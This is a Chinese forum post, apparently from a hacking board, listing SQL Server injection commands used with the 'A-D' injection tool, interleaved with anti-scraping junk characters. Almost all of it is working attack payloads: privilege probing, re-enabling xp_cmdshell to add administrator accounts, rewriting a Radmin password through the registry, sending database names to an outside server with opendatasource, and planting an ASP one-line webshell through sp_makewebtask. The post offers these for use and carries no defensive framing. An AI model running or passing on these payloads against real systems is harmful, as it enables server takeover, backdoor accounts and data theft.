找回密码
 立即注册
查看: 2242|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令% }3 l" v0 O& y% ?. _( }
//看看是什么权限的' m0 G/ b) y' b1 X: ~
and 1=(Select IS_MEMBER('db_owner'))
; N" ^. t! Z: d% W/ r9 vAnd char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--
" }+ |! L/ y$ o8 X6 _3 L) {, ]+ a. Z- S/ ?& ~' O- P
//检测是否有读取某数据库的权限
$ \6 ]4 g+ w  I2 s3 ~% Z3 }& @2 Zand 1= (Select HAS_DBACCESS('master'))
# P: a7 u; j5 B/ ]2 mAnd char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
/ Y$ l% \/ g- P8 d! H1 G8 v  R* i( S0 i9 Z" L# h4 y' s. f

- w3 Q' z  z% Q4 t数字类型
0 J) f+ h6 w3 J, n. [9 k2 `' {and char(124)%2Buser%2Bchar(124)=02 y6 R1 @- S  o) C
6 x& ^8 [: f  J$ D
字符类型, O/ I4 t0 C' j: l2 J- U
' and char(124)%2Buser%2Bchar(124)=0 and ''='
+ p5 A* W  X8 j9 V  [% W# C- g( N( ^
! \# ^# [: j+ M1 e搜索类型
$ \3 r5 G5 f: R! `  k6 A' and char(124)%2Buser%2Bchar(124)=0 and '%'='
* W# g' R/ f/ ?5 m9 A. k# N* N) R) f$ v/ d+ R0 m
爆用户名% P, @# y& w& l% f$ b
and user>06 e( _5 k+ y2 |0 S
' and user>0 and ''='2 }0 ?/ f- {1 ~! C2 v

7 E% i3 n* `  K- F7 u检测是否为SA权限" I" w, k$ @$ f. g
and 1=(select IS_SRVROLEMEMBER('sysadmin'));--" e* z( f+ C# m% q4 V: Y
And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
, Q1 S. E/ v; K, u% y" Y6 {
1 K& J9 S4 q" n- m检测是不是MSSQL数据库7 H) {: i0 z2 g7 y
and exists (select * from sysobjects);-- ! W8 e( l9 U3 z6 M0 X2 B. c
7 q- }. U, }' {, j- A0 y, m: ?
检测是否支持多行
  z4 z2 I/ d! n% J; K( `9 o;declare @d int;--
; s! y& r+ o  d. L  v: \' Y- f6 \
& y* p8 I' B, ]" q恢复 xp_cmdshell
# v; E4 R- A  I4 ?;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--# F+ ^) r" t9 X, G
1 H6 v+ W4 y! _& ^* O; p* H: \; l
. Z& W5 W" i! M
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') % u: y% k3 k6 V& t. V
3 B5 z- K# _% A$ k$ W
//-----------------------
& b! K% y$ s7 u# g//      执行命令
4 y, m2 `8 u2 Z4 i9 m//-----------------------
: Z! m/ X6 a2 V1 [. h$ l" |首先开启沙盘模式:
7 F- |; v/ O: X2 x8 C, F; _exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1% M, {& D( `6 D  ^2 F( _
( a7 T! f  i+ Q, }7 p9 v
然后利用jet.oledb执行系统命令. X2 U1 z$ C# \. }( a
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')
# t' s: N) ~' }5 g  }0 i! T9 h3 [& H9 l$ _( q1 m2 H
执行命令
& ~3 K' v8 ^( O2 ~;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--. ~  P; X0 S* I. D# |- ?
9 s3 ~  r& }- K' y/ R
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
5 a( v0 C( n0 e: T' G& j% t1 J3 n6 c+ ^! t8 |
判断xp_cmdshell扩展存储过程是否存在:
# [) @$ e7 j3 `0 j2 rhttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
$ @0 Y$ ^- ]7 y% c1 ?3 L& V0 g7 p/ A$ @) X$ h: w5 ]+ V+ l2 _
写注册表
" _, j) F; _* P5 [* Z3 s$ L' \4 Gexec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1# G6 X5 h2 ?7 N4 T) e" ?

9 S6 k! A$ C# a+ a0 IREG_SZ
+ t4 q0 Z6 b5 |! y0 h: d; ~# j
- D. G, R' l9 c4 ?读注册表: e- p+ }9 E& }3 |3 r6 V3 U: S
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
& J2 r1 ?2 |9 z, j# a! x- F" d( l4 F& Y" i
读取目录内容
9 h% M0 {# n$ V* ^$ oexec master..xp_dirtree 'c:\winnt\system32\',1,1+ q1 W; s5 l2 Q' |! M, l# m

+ m* H. S: r5 z" Y# V, V
" ~  J4 N" R( i$ [9 N# Y) K数据库备份
2 I3 x) U0 s9 T0 W, jbackup database pubs to disk = 'c:\123.bak'$ }8 p) Q, |7 E4 h7 R

5 q- J& C+ q9 U! d2 ~6 `  h//爆出长度2 d4 B! K2 Z) V: [2 g
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--
& D; R, q7 g6 k2 z/ J- T5 \4 ~( L1 q: m$ v$ B

% t9 w" o( r1 D3 S7 n1 H8 e
9 j0 v- B" M6 D0 K% e更改sa口令方法:用sql综合利用工具连接后,执行命令:
: ~% a! P) t- r% gexec sp_password NULL,'新密码','sa'
0 Z) K% s$ G; `+ i5 x; o/ N6 y& U2 j, u0 V7 y' r; x6 d( o0 Y  l& n3 I
添加和删除一个SA权限的用户test:9 f/ o, m# g, g2 `0 F1 y. N
exec master.dbo.sp_addlogin test,ptlove* L4 l/ D8 K; z: E( Q* K* ?
exec master.dbo.sp_addsrvrolemember test,sysadmin
2 R' s. C7 h4 d
7 p8 r3 ~& m; u( A7 |, x" ^' c删除扩展存储过过程xp_cmdshell的语句: 9 K, q% c1 l# H1 g" h* d5 R
exec sp_dropextendedproc 'xp_cmdshell'$ Y, ]6 {- Y/ V! {

+ ?* M* N2 t7 i& ]& L  A8 c, ~添加扩展存储过过程) ?1 e4 b3 l# R  B# i7 ~% ~
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
) m: S% O# |$ [/ s% J; V( HGRANT exec On xp_proxiedadata TO public 7 Y( d- _7 X) `& N# |) s

, G% O% Q% q* M" P% i: S5 y. j' ^" }0 W- t3 ]. |
停掉或激活某个服务。
: u* K/ _9 A: [$ A& B" ]! _
* X) r' L  Q( F; s, r' `/ texec master..xp_servicecontrol 'stop','schedule'
( E+ M8 F0 Y# \. L- Nexec master..xp_servicecontrol 'start','schedule'
7 Q6 {% H- o- H4 c1 V, v! A/ C  \% F9 a( q+ h$ F
dbo.xp_subdirs
" U! V  R4 v* X6 ?; Y1 q' W8 V6 T* C- z: M0 M" J
只列某个目录下的子目录。
5 V: H5 ^: _' m1 V$ Fxp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
3 W0 f" }" F2 e0 G; R, ^4 V2 c7 O0 L0 q3 J
dbo.xp_makecab
. ]) m, i0 z' u. f+ P8 I
: Q) U+ J. [# l7 [3 ^9 E将目标多个档案压缩到某个目标档案之内。1 o, ]9 `' I6 E3 C: Z
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。
1 t0 T- {5 C" D. s4 J* f+ h  `4 ~2 z7 n% o
dbo.xp_makecab/ c; ?6 V5 W0 T8 T) o7 a
'c:\test.cab','mszip',1,- H% d* g) k& X0 A& \( ~
'C:\Inetpub\wwwroot\SQLInject\login.asp',
( q/ K; q, E( u4 U  z" H* F- W'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'; D. e6 @' |8 u) G# D& F0 `. a

7 }7 s5 N1 w+ t* Sxp_terminate_process
7 X% [, t4 I* }) i8 I0 t+ r* I; H* a3 {8 q& f
停掉某个执行中的程序,但赋予的参数是 Process ID。( n, u4 X; t2 k/ j4 Y& n
利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
  T- {3 J' t! p/ }2 f9 Z- h1 L# f: X) M) n5 o
xp_terminate_process 2484
% L4 S& b, W7 B. `5 M& x# I4 w9 z$ o6 w+ W! R! i. W; ~5 T
xp_unpackcab( E/ H. T4 B; {% h6 _
8 g7 j7 g2 F3 \( {
解开压缩档。
6 i$ g; F7 i  f# D' p6 V6 X: @2 w
8 Y! V. O7 U+ Y5 k1 X$ Cxp_unpackcab 'c:\test.cab','c:\temp',1
2 P- @* R/ S& e$ A
) G& M/ G1 b3 R: W8 k
: ^5 \$ e! [7 E6 R2 ?9 I4 i# ?某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为12348 z: `8 f' u( b0 j" z; m& v, G+ D
9 k% _0 p" Y( q
create database lcx;
1 O$ C$ J* d, Z- SCreate TABLE ku(name nvarchar(256) null);& ~# s+ i. A7 j" J5 k, w0 n
Create TABLE biao(id int NULL,name nvarchar(256) null);# }9 M+ T( W9 K  [) a

3 [, }, b4 r" Q! h* M9 b! Q//得到数据库名5 \, D) S! F, G0 P8 `) j
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases1 [1 o' e7 L6 d7 P& O; q. ?
- T: |4 M4 N$ _

5 `% l  W0 i# Z) L# C& M//在Master中创建表,看看权限怎样( b! E8 W  h# {; \. P7 t% {
Create TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--
- _2 E* G1 X- M& E3 m; h3 B1 e  D# K3 s; z( l, I
用 sp_makewebtask直接在web目录里写入一句话马:& d3 Z0 B4 k8 }( ^0 T( ^
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
8 w; q& N& L# x. i9 D' A2 `* `% _5 l6 S5 I% N+ G+ v! ], ?
//更新表内容: ?; K# K4 g" B5 ~/ k
Update films SET kind = 'Dramatic' Where id = 123
' n& q1 D  g# P2 u" G+ \! |$ x3 o5 d3 x9 A  H; d! v% i5 U, ?
//删除内容
0 ^! H5 ?$ {" Y( q* Tdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表